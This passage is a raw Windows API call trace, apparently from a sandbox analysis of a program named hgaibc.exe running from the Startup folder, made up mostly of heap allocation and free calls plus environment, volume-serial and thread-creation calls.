RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8ac0 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e87f0 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8808 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8850 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e8898 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e88c8 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e94d8 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9520 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9580 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9400 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9448 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e92e0 [0177.844] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c6088, Size=0x400) returned 0x6c6088 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e95b0 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e94f0 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e93e8 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e92f8 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9568 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e94a8 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e93d0 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9508 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9538 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9310 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf0a8 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9328 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9598 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e94c0 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e95c8 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9550 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9478 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6e9340 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9490 [0177.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9358 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9370 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9388 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e93a0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e93b8 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9418 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9460 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf1a8 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9430 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9760 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9658 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9778 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9610 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9670 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e96d0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9640 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9688 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6e96a0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9790 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6e9748 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e96b8 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e96e8 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e95e0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e95f8 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9628 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9700 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9718 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9730 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e90d0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9148 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e90a0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e90e8 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e91c0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8fe0 [0177.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9268 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9208 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9058 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9088 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9280 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9040 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9100 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9070 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9118 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6e9220 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x12) returned 0x696520 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e90b8 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9190 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9130 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9160 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9298 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e91a8 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9010 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9178 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9238 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e91d8 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9250 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9028 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e91f0 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e92b0 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e92c8 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e8ff8 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9bf0 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9c08 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9d28 [0177.846] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9bc0 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9b60 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9b00 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9b48 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x6e9c38 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9d88 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf1b8 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9c20 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf0c8 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9da0 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9bd8 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9d40 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9d58 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9ce0 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9ba8 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9c50 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9c68 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9c80 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9cc8 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9b90 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9c98 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6e9cb0 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9b30 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6bf0e8 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9d70 [0177.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa) returned 0x6e9cf8 [0177.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d7798 | out: hHeap=0x680000) returned 1 [0177.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6eaee8 | out: hHeap=0x680000) returned 1 [0177.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6eae58 | out: hHeap=0x680000) returned 1 [0177.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c3f10 | out: hHeap=0x680000) returned 1 [0177.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697828 | out: hHeap=0x680000) returned 1 [0177.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x680000) returned 1 [0177.848] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6eafd0, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe")) returned 0x47 [0177.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6eafd0 | out: hHeap=0x680000) returned 1 [0177.848] lstrlenW (lpString="hgaibc.exe") returned 10 [0177.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6088 | out: hHeap=0x680000) returned 1 [0177.848] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x6eafd0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0177.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6fafd8 | out: hHeap=0x680000) returned 1 [0177.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6eafd0 | out: hHeap=0x680000) returned 1 [0177.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beac0 | out: hHeap=0x680000) returned 1 [0177.850] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0177.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d87a0 | out: hHeap=0x680000) returned 1 [0177.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6088 | out: hHeap=0x680000) returned 1 [0177.850] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x6d7798, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0177.850] lstrlenW (lpString="C:\\") returned 3 [0177.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0177.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d7798 | out: hHeap=0x680000) returned 1 [0177.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bf2f8 | out: hHeap=0x680000) returned 1 [0177.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d7798 | out: hHeap=0x680000) returned 1 [0177.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea978 | out: hHeap=0x680000) returned 1 [0177.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c3f10 | out: hHeap=0x680000) returned 1 [0177.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea8a0 | out: hHeap=0x680000) returned 1 [0177.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c44e8 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea948 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c63d0 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6eaab0 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c62b0 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea828 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6340 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea9f0 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bf378 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea858 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6088 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea888 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c4460 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea900 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bf3e8 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6ea8d0 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695448 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696560 | out: hHeap=0x680000) returned 1 [0177.853] lstrlenW (lpString="%systemdrive%") returned 13 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bec28 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c42c8 | out: hHeap=0x680000) returned 1 [0177.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bf2c8 | out: hHeap=0x680000) returned 1 [0177.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x6c7778, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0177.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d97a0 | out: hHeap=0x680000) returned 1 [0177.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70d3f0 | out: hHeap=0x680000) returned 1 [0177.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70d3c0 | out: hHeap=0x680000) returned 1 [0177.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c40a8 | out: hHeap=0x680000) returned 1 [0177.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x697b40 | out: hHeap=0x680000) returned 1 [0177.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6becf0 | out: hHeap=0x680000) returned 1 [0177.855] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x70dc18, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe")) returned 0x47 [0177.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70dc18 | out: hHeap=0x680000) returned 1 [0177.856] lstrlenW (lpString="hgaibc.exe") returned 10 [0177.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6088 | out: hHeap=0x680000) returned 1 [0177.856] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x70dc18, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0177.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x71dc20 | out: hHeap=0x680000) returned 1 [0177.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70dc18 | out: hHeap=0x680000) returned 1 [0177.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bed18 | out: hHeap=0x680000) returned 1 [0177.858] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0177.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6faff0 | out: hHeap=0x680000) returned 1 [0177.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6088 | out: hHeap=0x680000) returned 1 [0177.858] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x6faff0, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0177.858] lstrlenW (lpString="C:\\") returned 3 [0177.858] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0177.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6faff0 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c3b0 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d97a0 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c5f8 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c4790 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c508 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c3b58 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c538 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c63d0 | out: hHeap=0x680000) returned 1 [0177.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c460 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c62b0 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c550 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6340 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c568 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c2d0 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c448 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6088 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c5e0 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c3e00 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c4d8 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c350 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c4f0 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6954d8 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696400 | out: hHeap=0x680000) returned 1 [0177.861] lstrlenW (lpString="%systemdrive%") returned 13 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bed18 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c4130 | out: hHeap=0x680000) returned 1 [0177.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x70c2c0 | out: hHeap=0x680000) returned 1 [0177.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x6eafd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0177.862] WaitForMultipleObjects (nCount=0x2, lpHandles=0x69c290*=0x260, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 81 os_tid = 0x380 Thread: id = 83 os_tid = 0xc5c [0177.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x70c460 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x70c460, Size=0x20) returned 0x6bed40 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bed40, Size=0x40) returned 0x697948 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697948, Size=0x80) returned 0x6c4708 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4708, Size=0x100) returned 0x6c6298 [0177.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x70c568 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x70c568, Size=0x20) returned 0x6bed40 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6bed40, Size=0x40) returned 0x697678 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x697678, Size=0x80) returned 0x6c4680 [0177.893] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6c4680, Size=0x100) returned 0x6dc5d8 [0177.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x70c460 [0177.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x70c350 [0177.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x70c550 [0177.894] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x70c350, Size=0x8) returned 0x70c3a0 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x6961c0 [0177.894] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x70c3a0, Size=0x10) returned 0x70c4d8 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x696420 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a) returned 0x6beac0 [0177.894] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x70c4d8, Size=0x20) returned 0x6bed18 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x6be908 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16) returned 0x696120 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a) returned 0x6bed40 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x70c4d8 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x70c2c0 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x697b40 [0177.894] RtlReAllocateHeap 